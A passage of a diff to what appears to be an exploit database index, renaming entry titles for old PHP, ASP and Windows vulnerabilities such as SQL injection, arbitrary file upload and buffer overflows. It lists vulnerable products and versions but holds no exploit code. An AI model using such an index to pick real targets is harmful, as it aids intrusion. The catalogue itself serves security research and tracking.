inc0mp13te",php,webapps,0 @@ -11276,7 +11277,7 @@ id,file,description,date,author,platform,type,port 12345,platforms/php/webapps/12345.txt,"phpGreetCards 3.7 - Cross-Site Scripting",2010-04-22,Valentin,php,webapps,0 12346,platforms/php/webapps/12346.txt,"AJ Matrix 3.1 - 'id' Multiple SQL Injection",2010-04-22,v3n0m,php,webapps,0 12349,platforms/php/webapps/12349.txt,"AJ Shopping Cart 1.0 (maincatid) - SQL Injection",2010-04-22,v3n0m,php,webapps,0 -12350,platforms/php/webapps/12350.txt,"In-portal 5.0.3 - Arbitrary File Upload Exploit",2010-04-23,eidelweiss,php,webapps,0 +12350,platforms/php/webapps/12350.txt,"In-portal 5.0.3 - Arbitrary File Upload",2010-04-23,eidelweiss,php,webapps,0 12351,platforms/php/webapps/12351.txt,"memorial Web site script - 'id' SQL Injection",2010-04-23,v3n0m,php,webapps,0 12353,platforms/php/webapps/12353.txt,"EPay Enterprise 4.13 - 'cid' SQL Injection",2010-04-23,v3n0m,php,webapps,0 12354,platforms/php/webapps/12354.pl,"NKINFOWEB - SQL Injection",2010-04-23,d4rk-h4ck3r,php,webapps,0 @@ -11287,8 +11288,8 @@ id,file,description,date,author,platform,type,port 12360,platforms/php/webapps/12360.pl,"Template Seller Pro 3.25 - (tempid) SQL Injection",2010-04-23,v3n0m,php,webapps,0 12361,platforms/php/webapps/12361.txt,"lanewsfactory - Multiple Vulnerabilities",2010-04-23,"Salvatore Fresta",php,webapps,0 12364,platforms/php/webapps/12364.txt,"Openpresse 1.01 - Local File Inclusion",2010-04-24,"cr4wl3r ",php,webapps,0 -12365,platforms/php/webapps/12365.txt,"Openplanning 1.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Include",2010-04-24,"cr4wl3r ",php,webapps,0 -12366,platforms/php/webapps/12366.txt,"Openfoncier 2.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Include",2010-04-24,"cr4wl3r ",php,webapps,0 +12365,platforms/php/webapps/12365.txt,"Openplanning 1.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-24,"cr4wl3r ",php,webapps,0 +12366,platforms/php/webapps/12366.txt,"Openfoncier 2.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-24,"cr4wl3r ",php,webapps,0 12367,platforms/windows/remote/12367.html,"HP Digital Imaging - 'hpodio08.dll' Insecure Method Exploit",2010-04-24,"ThE g0bL!N",windows,remote,0 12368,platforms/windows/local/12368.pl,"ZipWrangler 1.20 - '.zip' SEH Exploit",2010-04-24,"TecR0c and Sud0",windows,local,0 12369,platforms/php/webapps/12369.txt,"Madirish Webmail 2.01 - 'baseDir' Remote File Inclusion / Local File Inclusion",2010-04-24,eidelweiss,php,webapps,0 @@ -11297,14 +11298,14 @@ id,file,description,date,author,platform,type,port 12372,platforms/php/webapps/12372.txt,"AskMe Pro 2.1 - (que_id) SQL Injection",2010-04-24,v3n0m,php,webapps,0 12373,platforms/php/webapps/12373.txt,"Sethi Family Guestbook 3.1.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 12374,platforms/php/webapps/12374.txt,"G5 Scripts Guestbook PHP 1.2.8 - Cross-Site Scripting",2010-04-24,Valentin,php,webapps,0 -12375,platforms/osx/dos/12375.c,"Apple Mac OS X 10.6 - HFS File System Attack (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",osx,dos,0 -12376,platforms/php/webapps/12376.php,"SmodCMS 4.07 (fckeditor) - Arbitrary File Upload Exploit",2010-04-24,eidelweiss,php,webapps,0 +12375,platforms/osx/dos/12375.c,"Apple Mac OSX 10.6 - HFS File System Attack (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",osx,dos,0 +12376,platforms/php/webapps/12376.php,"SmodCMS 4.07 (fckeditor) - Arbitrary File Upload",2010-04-24,eidelweiss,php,webapps,0 12378,platforms/php/webapps/12378.txt,"CMS Firebrand Tec - Local File Inclusion",2010-04-25,R3VAN_BASTARD,php,webapps,0 12379,platforms/windows/local/12379.php,"Easyzip 2000 3.5 - '.zip' Stack Buffer Overflow (PoC)",2010-04-25,mr_me,windows,local,0 12380,platforms/windows/remote/12380.pl,"Rumba ftp Client 4.2 - PASV Buffer Overflow (SEH)",2010-04-25,zombiefx,windows,remote,0 -12381,platforms/php/webapps/12381.php,"phpegasus 0.1.2 - 'FCKeditor' Arbitrary File Upload Exploit",2010-04-25,eidelweiss,php,webapps,0 +12381,platforms/php/webapps/12381.php,"phpegasus 0.1.2 - 'FCKeditor' Arbitrary File Upload",2010-04-25,eidelweiss,php,webapps,0 12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service",2010-04-25,SeeMe,multiple,dos,0 -12383,platforms/php/webapps/12383.txt,"clipak - Upload Exploit",2010-04-25,indoushka,php,webapps,0 +12383,platforms/php/webapps/12383.txt,"clipak - Arbitrary File Upload",2010-04-25,indoushka,php,webapps,0 12384,platforms/php/webapps/12384.txt,"Powered by iNetScripts - Arbitrary File Upload",2010-04-25,Sec-q8,php,webapps,0 12385,platforms/php/webapps/12385.html,"TR Forum 1.5 - Insert Admin Cross-Site Request Forgery",2010-04-25,EL-KAHINA,php,webapps,0 12386,platforms/php/webapps/12386.txt,"PHP Classifieds 6.09 - E-mail Dump",2010-04-25,indoushka,php,webapps,0 @@ -11312,7 +11313,7 @@ id,file,description,date,author,platform,type,port 12388,platforms/windows/local/12388.rb,"WM Downloader 3.0.0.9 - Buffer Overflow (Metasploit)",2010-04-25,blake,windows,local,0 12395,platforms/php/webapps/12395.txt,"2DayBiz Advanced Poll Script - Cross-Site Scripting / Authentication Bypass",2010-04-26,Sid3^effects,php,webapps,0 12396,platforms/php/webapps/12396.txt,"OpenCominterne 1.01 - Local File Inclusion",2010-04-26,"cr4wl3r ",php,webapps,0 -12398,platforms/php/webapps/12398.txt,"Opencourrier 2.03beta - (Remote File Inclusion / Local File Inclusion) Multiple File Include",2010-04-26,"cr4wl3r ",php,webapps,0 +12398,platforms/php/webapps/12398.txt,"Opencourrier 2.03beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-26,"cr4wl3r ",php,webapps,0 12399,platforms/php/webapps/12399.txt,"Uiga Personal Portal - 'index.php' (view) SQL Injection",2010-04-26,41.w4r10r,php,webapps,0 12400,platforms/php/webapps/12400.txt,"Joomla Component com_joomradio - SQL Injection",2010-04-26,Mr.tro0oqy,php,webapps,0 12401,platforms/multiple/dos/12401.html,"WebKit 532.5 - Stack Exhaustion",2010-04-26,"Mathias Karlsson",multiple,dos,0 @@ -11331,7 +11332,7 @@ id,file,description,date,author,platform,type,port 12416,platforms/php/webapps/12416.txt,"PHP Quick Arcade 3.0.21 - Multiple Vulnerabilities",2010-04-27,ITSecTeam,php,webapps,0 12417,platforms/windows/remote/12417.py,"Bigant Messenger 2.52 - (AntCore.dll) RegisterCom() Remote Heap Overflow",2010-04-27,mr_me,windows,remote,0 12419,platforms/php/webapps/12419.txt,"Boutique SudBox 1.2 - Changer Login et Mot de Passe Cross-Site Request Forgery",2010-04-27,indoushka,php,webapps,0 -12420,platforms/php/webapps/12420.php,"Portaneo Portal 2.2.3 - Arbitrary File Upload Exploit",2010-04-27,eidelweiss,php,webapps,0 +12420,platforms/php/webapps/12420.php,"Portaneo Portal 2.2.3 - Arbitrary File Upload",2010-04-27,eidelweiss,php,webapps,0 12421,platforms/php/webapps/12421.txt,"Help Center Live 2.0.6 - (module=helpcenter&file=) Local File Inclusion",2010-04-27,41.w4r10r,php,webapps,0 12422,platforms/windows/dos/12422.pl,"Acoustica 3.32 CD/DVD Label Maker - '.m3u' (PoC)",2010-04-27,chap0,windows,dos,0 12423,platforms/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,php,webapps,0 @@ -11343,7 +11344,7 @@ id,file,description,date,author,platform,type,port 12429,platforms/php/webapps/12429.pl,"Joomla ABC Extension com_abc - SQL Injection",2010-04-27,AntiSecurity,php,webapps,0 12430,platforms/php/webapps/12430.txt,"Joomla Component graphics (com_graphics) 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0 12431,platforms/windows/dos/12431.html,"Webmoney Advisor - ActiveX Remote Denial of Service",2010-04-28,Go0o$E,windows,dos,0 -12432,platforms/php/webapps/12432.txt,"Joomla JE Property Finder Component - Upload",2010-04-28,Sid3^effects,php,webapps,0 +12432,platforms/php/webapps/12432.txt,"Joomla JE Property Finder Component - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps,0 12433,platforms/cgi/webapps/12433.py,"NIBE heat pump - Remote Code Execution",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12434,platforms/cgi/webapps/12434.py,"NIBE heat pump - Local File Inclusion",2010-04-28,"Jelmer de Hen",cgi,webapps,0 12435,platforms/php/webapps/12435.txt,"Zabbix 1.8.1 - SQL Injection",2010-04-01,"Dawid Golunski",php,webapps,0 @@ -11352,7 +11353,7 @@ id,file,description,date,author,platform,type,port 12438,platforms/php/webapps/12438.txt,"SoftBizScripts Dating Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0 12439,platforms/php/webapps/12439.txt,"SoftBizScripts Hosting Script - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0 12440,platforms/php/webapps/12440.txt,"Joomla Component Wap4Joomla - 'wapmain.php' SQL Injection",2010-04-28,Manas58,php,webapps,0 -12441,platforms/php/webapps/12441.html,"gpEasy 1.6.1 - Cross-Site Request Forgery Remote Add Admin Exploit",2010-04-28,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0 +12441,platforms/php/webapps/12441.html,"gpEasy 1.6.1 - Cross-Site Request Forgery Remote Add Admin",2010-04-28,"Giuseppe 'giudinvx' D'Inverno",php,webapps,0 12442,platforms/php/webapps/12442.txt,"GeneShop 5.1.1 - SQL Injection",2010-04-28,41.w4r10r,php,webapps,0 12443,platforms/php/webapps/12443.txt,"Modelbook - 'casting_view.php' SQL Injection",2010-04-28,v3n0m,php,webapps,0 12444,platforms/php/webapps/12444.txt,"PHP Video Battle - SQL Injection",2010-04-28,v3n0m,php,webapps,0 @@ -11365,7 +11366,7 @@ id,file,description,date,author,platform,type,port 12451,platforms/php/webapps/12451.txt,"iScripts VisualCaster - SQL Injection",2010-04-29,Sid3^effects,php,webapps,0 12452,platforms/php/webapps/12452.txt,"TaskFreak 0.6.2 - SQL Injection",2010-04-29,"Justin C. Klein Keane",php,webapps,0 12453,platforms/php/webapps/12453.txt,"Zyke CMS 1.1 - Bypass Exploit",2010-04-29,indoushka,php,webapps,0 -12454,platforms/php/webapps/12454.txt,"Zyke CMS 1.0 - Remote File Upload",2010-04-29,indoushka,php,webapps,0 +12454,platforms/php/webapps/12454.txt,"Zyke CMS 1.0 - Arbitrary File Upload",2010-04-29,indoushka,php,webapps,0 12455,platforms/php/webapps/12455.txt,"Ucenter Projekt 2.0 - Insecure crossdomain (Cross-Site Scripting)",2010-04-29,indoushka,php,webapps,0 12456,platforms/php/webapps/12456.txt,"chCounter - indirect SQL Injection / Cross-Site Scripting",2010-04-29,Valentin,php,webapps,0 12457,platforms/windows/dos/12457.txt,"Apple Safari 4.0.3 (Windows/x86) - (Windows/x86) CSS Remote Denial of Service",2010-04-29,ITSecTeam,windows,dos,0 @@ -11380,7 +11381,7 @@ id,file,description,date,author,platform,type,port 12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion",2010-04-30,eidelweiss,php,webapps,0 12467,platforms/php/webapps/12467.txt,"Webthaiapp - detail.php (cat) Blind SQL Injection",2010-04-30,Xelenonz,php,webapps,0 12468,platforms/php/webapps/12468.txt,"Alibaba Clone Platinum - 'offers_buy.php' SQL Injection",2010-04-30,v3n0m,php,webapps,0 -12469,platforms/windows/local/12469.rb,"Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 - '.zip' SEH",2010-04-30,Lincoln,windows,local,0 +12469,platforms/windows/local/12469.rb,"Urgent Backup 3.20 / ABC Backup Pro 5.20 / ABC Backup 5.50 - '.zip' SEH Exploit",2010-04-30,Lincoln,windows,local,0 12471,platforms/asp/webapps/12471.txt,"Comersus 8 Shopping Cart - SQL Injection / Cross-Site Request Forgery",2010-05-01,Sid3^effects,asp,webapps,0 12472,platforms/php/webapps/12472.txt,"CF Image Host 1.1 - Remote File Inclusion",2010-05-01,The.Morpheus,php,webapps,0 12473,platforms/php/webapps/12473.txt,"Joomla Component Table JX - Cross-Site Scripting Vulnerabilities",2010-05-01,Valentin,php,webapps,0 @@ -11389,17 +11390,17 @@ id,file,description,date,author,platform,type,port 12476,platforms/php/webapps/12476.txt,"Opencimetiere 2.01 - Multiple Remote File Inclusion",2010-05-01,"cr4wl3r ",php,webapps,0 12477,platforms/windows/dos/12477.txt,"Google Chrome 4.1.249.1064 - Remote Memory Corrupt",2010-05-01,eidelweiss,windows,dos,0 12478,platforms/asp/webapps/12478.txt,"Mesut Manþet Haber 1.0 - Authentication Bypass",2010-05-02,LionTurk,asp,webapps,0 -12479,platforms/php/webapps/12479.txt,"Joomla DJ-Classifieds Extension com_djClassifieds - Upload",2010-05-02,Sid3^effects,php,webapps,0 +12479,platforms/php/webapps/12479.txt,"Joomla DJ-Classifieds Extension com_djClassifieds - Arbitrary File Upload",2010-05-02,Sid3^effects,php,webapps,0 12480,platforms/windows/remote/12480.txt,"Acritum Femitter Server 1.03 - Multiple Vulnerabilities",2010-05-02,"Zer0 Thunder",windows,remote,0 12481,platforms/php/webapps/12481.txt,"WHMCS Control 2 - 'announcements.php' SQL Injection",2010-05-02,"Islam DefenDers",php,webapps,0 12482,platforms/windows/dos/12482.py,"TFTPGUI - Long Transport Mode Overflow",2010-05-02,"Jeremiah Talamantes",windows,dos,0 12484,platforms/php/webapps/12484.txt,"GuppY 4.5.18 - Blind SQL Injection / XPath Injection",2010-05-02,indoushka,php,webapps,0 12485,platforms/php/webapps/12485.txt,"Burning Board Lite 1.0.2 - Arbitrary File Upload",2010-05-02,indoushka,php,webapps,0 -12486,platforms/php/webapps/12486.txt,"Openannuaire Openmairie Annuaire 2.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Include",2010-05-02,"cr4wl3r ",php,webapps,0 +12486,platforms/php/webapps/12486.txt,"Openannuaire Openmairie Annuaire 2.00 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-05-02,"cr4wl3r ",php,webapps,0 12487,platforms/windows/dos/12487.html,"Apple Safari 4.0.5 - JavaScriptCore.dll Stack Exhaustion",2010-05-03,"Mathias Karlsson",windows,dos,0 12488,platforms/php/webapps/12488.txt,"Gallo 0.1.0 - Remote File Inclusion",2010-05-03,"cr4wl3r ",php,webapps,0 12489,platforms/php/webapps/12489.txt,"Joomla_1.6.0-Alpha2 - Cross-Site Scripting",2010-05-03,mega-itec.com,php,webapps,0 -12491,platforms/multiple/dos/12491.html,"All browsers - Crash Exploit",2010-05-03,"Inj3ct0r Team",multiple,dos,0 +12491,platforms/multiple/dos/12491.html,"All browsers - Crash",2010-05-03,"Inj3ct0r Team",multiple,dos,0 14025,platforms/php/webapps/14025.txt,"2DayBiz Job Site Script - SQL Injection",2010-06-24,Sangteamtham,php,webapps,0 12492,platforms/windows/dos/12492.html,"Firefox 3.6.3 - Fork Bomb Denial of Service",2010-05-03,Dr_IDE,windows,dos,0 12493,platforms/multiple/dos/12493.html,"All Browsers - Long Unicode Denial of Service (PoC)",2010-05-03,Dr_IDE,multiple,dos,0 @@ -11412,7 +11413,7 @@ id,file,description,date,author,platform,type,port 12500,platforms/php/webapps/12500.txt,"Clicksor - SQL Injection",2010-05-04,JM511,php,webapps,0 12501,platforms/windows/local/12501.php,"Beyond Compare 3.0.13 b9599 - '.zip' Stack Buffer Overflow (PoC)",2010-05-04,mr_me,windows,local,0 12504,platforms/php/webapps/12504.txt,"thEngine 0.1 - Local File Inclusion",2010-05-04,team_elite,php,webapps,0 -12506,platforms/php/webapps/12506.php,"Knowledgeroot (fckeditor) - Arbitrary File Upload Exploit",2010-05-04,eidelweiss,php,webapps,0 +12506,platforms/php/webapps/12506.php,"Knowledgeroot (fckeditor) - Arbitrary File Upload",2010-05-04,eidelweiss,php,webapps,0 12507,platforms/php/webapps/12507.txt,"SmartCMS 2 - SQL Injection",2010-05-04,Ariko-Security,php,webapps,0 12508,platforms/osx/dos/12508.html,"Multiple browsers - history.go() Denial of Service",2010-05-04,Dr_IDE,osx,dos,0 12509,platforms/osx/dos/12509.html,"Multiple browsers - window.print() Denial of Service",2010-05-04,Dr_IDE,osx,dos,0 @@ -11428,7 +11429,7 @@ id,file,description,date,author,platform,type,port 12520,platforms/php/webapps/12520.html,"OCS Inventory NG Server 1.3.1 - 'LOGIN' Remote Authentication Bypass",2010-05-06,"Nicolas DEROUET",php,webapps,0 12521,platforms/php/webapps/12521.txt,"Factux - Local File Inclusion",2010-05-06,"ALTBTA ",php,webapps,0 12522,platforms/php/webapps/12522.txt,"WeBProdZ CMS - SQL Injection",2010-05-06,MasterGipy,php,webapps,0 -12523,platforms/php/webapps/12523.txt,"REZERVI 3.0.2 - Remote Command Execution Exploit",2010-05-06,"JosS and eidelweiss",php,webapps,0 +12523,platforms/php/webapps/12523.txt,"REZERVI 3.0.2 - Remote Command Execution",2010-05-06,"JosS and eidelweiss",php,webapps,0 12524,platforms/windows/dos/12524.py,"Microsoft Windows - SMB2 Negotiate Protocol (0x72) Response Denial of Service",2010-05-07,"Jelmer de Hen",windows,dos,0 12525,platforms/php/webapps/12525.txt,"PHP-Nuke - 'friend.php' Module SQL Injection",2010-05-07,CMD,php,webapps,0 12526,platforms/asp/webapps/12526.txt,"ArticleLive (Interspire Website Publisher) - SQL Injection",2010-05-07,Ra3cH,asp,webapps,0 @@ -11441,7 +11442,7 @@ id,file,description,date,author,platform,type,port 12533,platforms/php/webapps/12533.txt,"big.asp - SQL Injection",2010-05-08,Ra3cH,php,webapps,0 12534,platforms/php/webapps/12534.txt,"PHP Link Manager 1.7 - URL redirection Bug",2010-05-08,ITSecTeam,php,webapps,0 12535,platforms/php/webapps/12535.txt,"phpscripte24 Countdown Standart Rückwärts Auktions System - SQL Injection",2010-05-08,"Easy Laster",php,webapps,0 -12539,platforms/php/webapps/12539.txt,"Joomla Component com_articleman - Upload",2010-05-08,Sid3^effects,php,webapps,0 +12539,platforms/php/webapps/12539.txt,"Joomla Component com_articleman - Arbitrary File Upload",2010-05-08,Sid3^effects,php,webapps,0 12540,platforms/windows/local/12540.rb,"IDEAL Migration 4.5.1 - Buffer Overflow (Metasploit)",2010-05-08,blake,windows,local,0 12541,platforms/windows/dos/12541.php,"Dolphin 2.0 - '.elf' Local Denial Of Service",2010-05-09,"Yakir Wizman",windows,dos,0 12542,platforms/php/webapps/12542.rb,"phpscripte24 Shop System - SQL Injection",2010-05-09,"Easy Laster",php,webapps,0 @@ -11456,7 +11457,7 @@ id,file,description,date,author,platform,type,port 12553,platforms/php/webapps/12553.txt,"Dark Hart Portal - 'login.php' Remote File Inclusion",2010-05-10,CoBRa_21,php,webapps,0 12554,platforms/php/dos/12554.txt,"MiniManager For Mangos/Trinity Server - Denial of Service",2010-05-10,XroGuE,php,dos,0 12555,platforms/multiple/dos/12555.txt,"Pargoon CMS - Denial of Service",2010-05-10,"Pouya Daneshmand",multiple,dos,0 -12556,platforms/php/webapps/12556.txt,"Tadbir CMS - 'FCKeditor' Arbitrary File Upload Exploit",2010-05-10,"Pouya Daneshmand",php,webapps,0 +12556,platforms/php/webapps/12556.txt,"Tadbir CMS - 'FCKeditor' Arbitrary File Upload",2010-05-10,"Pouya Daneshmand",php,webapps,0 12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0 12558,platforms/php/webapps/12558.txt,"29o3 CMS - (LibDir) Multiple Remote File Inclusion",2010-05-10,eidelweiss,php,webapps,0 12560,platforms/php/webapps/12560.txt,"724CMS Enterprise 4.59 - SQL Injection",2010-05-10,cyberlog,php,webapps,0 @@ -11466,8 +11467,8 @@ id,file,description,date,author,platform,type,port 12564,platforms/windows/dos/12564.txt,"Microsoft Windows Outlook Express and Windows Mail - Integer Overflow",2010-05-11,"Francis Provencher",windows,dos,0 12565,platforms/php/webapps/12565.txt,"724CMS Enterprise 4.59 - (section.php) Local File Inclusion",2010-05-11,CoBRa_21,php,webapps,0 12566,platforms/php/webapps/12566.txt,"724CMS Enterprise 4.59 - (section.php) SQL Injection",2010-05-11,CoBRa_21,php,webapps,0 -12567,platforms/php/webapps/12567.html,"Aqar Script 1.0 - Remote Bypass Exploit",2010-05-11,indoushka,php,webapps,0 -12568,platforms/php/webapps/12568.txt,"Digital College 1.0 - Upload",2010-05-11,indoushka,php,webapps,0 +12567,platforms/php/webapps/12567.html,"Aqar Script 1.0 - Remote Bypass",2010-05-11,indoushka,php,webapps,0 +12568,platforms/php/webapps/12568.txt,"Digital College 1.0 - Arbitrary File Upload",2010-05-11,indoushka,php,webapps,0 12569,platforms/php/webapps/12569.html,"Fast Free Media 1.3 - Adult Site - Arbitrary File Upload",2010-05-11,indoushka,php,webapps,0 12570,platforms/php/webapps/12570.txt,"Uploader 0.1.5 - Multiple Vulnerabilities",2010-05-11,indoushka,php,webapps,0 12571,platforms/asp/webapps/12571.txt,"e-webtech - 'page.asp' SQL Injection",2010-05-11,CoBRa_21,asp,webapps,0 @@ -11511,8 +11512,8 @@ id,file,description,date,author,platform,type,port 12610,platforms/multiple/webapps/12610.txt,"VMware View Portal 3.1 - Cross-Site Scripting",2010-05-14,"Alexey Sintsov",multiple,webapps,0 12611,platforms/php/webapps/12611.txt,"Joomla Component MS Comment 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0 12612,platforms/php/webapps/12612.txt,"Alibaba Clone Platinum - 'about_us.php' SQL Injection",2010-05-15,CoBRa_21,php,webapps,0 -12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 (tiny_mce) - Remote File Upload",2010-05-15,ITSecTeam,php,webapps,0 -12614,platforms/windows/remote/12614.txt,"Safari 4.0.5 - parent.close() Memory Corruption Exploit (ASLR + DEP Bypass)",2010-05-15,"Alexey Sintsov",windows,remote,0 +12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 (tiny_mce) - Arbitrary File Upload",2010-05-15,ITSecTeam,php,webapps,0 +12614,platforms/windows/remote/12614.txt,"Safari 4.0.5 - parent.close() Memory Corruption (ASLR + DEP Bypass)",2010-05-15,"Alexey Sintsov",windows,remote,0 12615,platforms/php/webapps/12615.txt,"Joomla Component com_camp - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0 12617,platforms/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps,0 12618,platforms/php/webapps/12618.txt,"Joomla Component simpledownload 0.9.5 - Local File Inclusion",2010-05-16,Xr0b0t,php,webapps,0 @@ -11521,7 +11522,7 @@ id,file,description,date,author,platform,type,port 12621,platforms/windows/local/12621.pl,"Shellzip 3.0 Beta 3 - '.zip' Stack Buffer Overflow (PoC)",2010-05-16,sud0,windows,local,0 12623,platforms/php/webapps/12623.txt,"Joomla Component simpledownload 0.9.5 - Local File Disclosure",2010-05-16,"ALTBTA ",php,webapps,0 12624,platforms/php/webapps/12624.txt,"LinPHA 1.3.2 - (rotate.php) Remote Command Execution",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0 -12628,platforms/php/webapps/12628.txt,"EgO 0.7b - 'FCKeditor' Remote File Upload",2010-05-16,ITSecTeam,php,webapps,0 +12628,platforms/php/webapps/12628.txt,"EgO 0.7b - 'FCKeditor' Arbitrary File Upload",2010-05-16,ITSecTeam,php,webapps,0 12629,platforms/php/webapps/12629.txt,"Tainos - Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0 12630,platforms/php/webapps/12630.txt,"I-Vision CMS - Cross-Site Scripting / SQL Injection",2010-05-16,Ariko-Security,php,webapps,0 12631,platforms/php/webapps/12631.txt,"Tainos Webdesign (All Scripts) - SQL Injection / Cross-Site Scripting / HTML Injection",2010-05-17,CoBRa_21,php,webapps,0 @@ -11538,7 +11539,7 @@ id,file,description,date,author,platform,type,port 12643,platforms/php/webapps/12643.pl,"ChillyCMS - Blind SQL Injection",2010-05-18,IHTeam,php,webapps,0 12644,platforms/php/webapps/12644.txt,"WebJaxe - SQL Injection",2010-05-18,IHTeam,php,webapps,0 12645,platforms/php/webapps/12645.txt,"TS Special Edition 7.0 - Multiple Vulnerabilities",2010-05-18,IHTeam,php,webapps,0 -12646,platforms/php/webapps/12646.txt,"B-Hind CMS (tiny_mce) - Remote File Upload",2010-05-18,"innrwrld and h00die",php,webapps,0 +12646,platforms/php/webapps/12646.txt,"B-Hind CMS (tiny_mce) - Arbitrary File Upload",2010-05-18,"innrwrld and h00die",php,webapps,0 12647,platforms/php/webapps/12647.txt,"Webloader 7 - 8 (vid) SQL Injection",2010-05-18,ByEge,php,webapps,0 12648,platforms/php/webapps/12648.txt,"Joomla Component com_packages - SQL Injection",2010-05-18,"Kernel Security Group",php,webapps,0 12650,platforms/windows/dos/12650.txt,"Attachmate Reflection Standard Suite 2008 - ActiveX Buffer Overflow",2010-05-18,"Rad L. Sneak",windows,dos,0 @@ -11560,7 +11561,7 @@ id,file,description,date,author,platform,type,port 12666,platforms/php/webapps/12666.txt,"DB[CMS] - 'article.php' SQL Injection",2010-05-20,blackraptor,php,webapps,0 12667,platforms/php/webapps/12667.py,"Entry Level Content Management System (EL CMS) - SQL Injection",2010-05-20,"vir0e5 ",php,webapps,0 12671,platforms/php/webapps/12671.txt,"Powder Blue Design - SQL Injection",2010-05-20,cyberlog,php,webapps,0 -12672,platforms/asp/webapps/12672.txt,"Spaw Editor 1.0 & 2.0 - Remote File Upload",2010-05-20,Ma3sTr0-Dz,asp,webapps,0 +12672,platforms/asp/webapps/12672.txt,"Spaw Editor 1.0 & 2.0 - Arbitrary File Upload",2010-05-20,Ma3sTr0-Dz,asp,webapps,0 12673,platforms/windows/remote/12673.txt,"ComponentOne VSFlexGrid 7 & 8 - 'Archive()' method Remote Buffer Overflow",2010-05-20,Ma3sTr0-Dz,windows,remote,0 12674,platforms/php/webapps/12674.txt,"webYourPhotos 6.05 - 'index.php' Remote File Inclusion",2010-05-20,"Sn!pEr.S!Te Hacker",php,webapps,0 30093,platforms/linux/local/30093.txt,"Mutt 1.4.2 - Mutt_Gecos_Name Function Local Buffer Overflow",2007-05-28,raylai,linux,local,0 @@ -11582,18 +11583,18 @@ id,file,description,date,author,platform,type,port 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,windows,dos,0 12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0 12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - (Post-Authentication) Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0 -12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload Exploit",2010-05-21,Ma3sTr0-Dz,php,webapps,0 +12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0 12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,"cr4wl3r ",php,webapps,0 14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0 -12692,platforms/php/webapps/12692.txt,"TinyBrowser - Remote File upload",2010-05-22,Ra3cH,php,webapps,0 -12693,platforms/asp/webapps/12693.txt,"Asset Manager - Remote File upload",2010-05-22,Ra3cH,asp,webapps,0 +12692,platforms/php/webapps/12692.txt,"TinyBrowser - Arbitrary File Upload",2010-05-22,Ra3cH,php,webapps,0 +12693,platforms/asp/webapps/12693.txt,"Asset Manager - Arbitrary File Upload",2010-05-22,Ra3cH,asp,webapps,0 12694,platforms/php/webapps/12694.txt,"Tochin eCommerce - Multiple Remote Exploits",2010-05-22,cyberlog,php,webapps,0 12695,platforms/php/webapps/12695.txt,"Azimut Technologie - Admin Login Bypass",2010-05-22,Ra3cH,php,webapps,0 12696,platforms/php/webapps/12696.txt,"E-Commerce Group - 'cat.php' SQL Injection",2010-05-22,"BLack Revenge",php,webapps,0 -12697,platforms/php/webapps/12697.php,"hustoj - 'FCKeditor' Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0 +12697,platforms/php/webapps/12697.php,"hustoj - 'FCKeditor' Arbitrary File Upload",2010-05-22,eidelweiss,php,webapps,0 12698,platforms/windows/dos/12698.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - 'PORT' Command Remote Denial of Service",2010-05-22,Ma3sTr0-Dz,windows,dos,0 -12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - (WYSIWYG) Remote File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0 -12700,platforms/asp/webapps/12700.txt,"DotNetNuke - Remote File upload",2010-05-22,"Ra3cH and Ma3sTr0-Dz",asp,webapps,0 +12699,platforms/php/webapps/12699.txt,"eWebEditor 1.x - (WYSIWYG) Arbitrary File Upload",2010-05-22,Ma3sTr0-Dz,php,webapps,0 +12700,platforms/asp/webapps/12700.txt,"DotNetNuke - Arbitrary File Upload",2010-05-22,"Ra3cH and Ma3sTr0-Dz",asp,webapps,0 12701,platforms/asp/webapps/12701.txt,"Rave 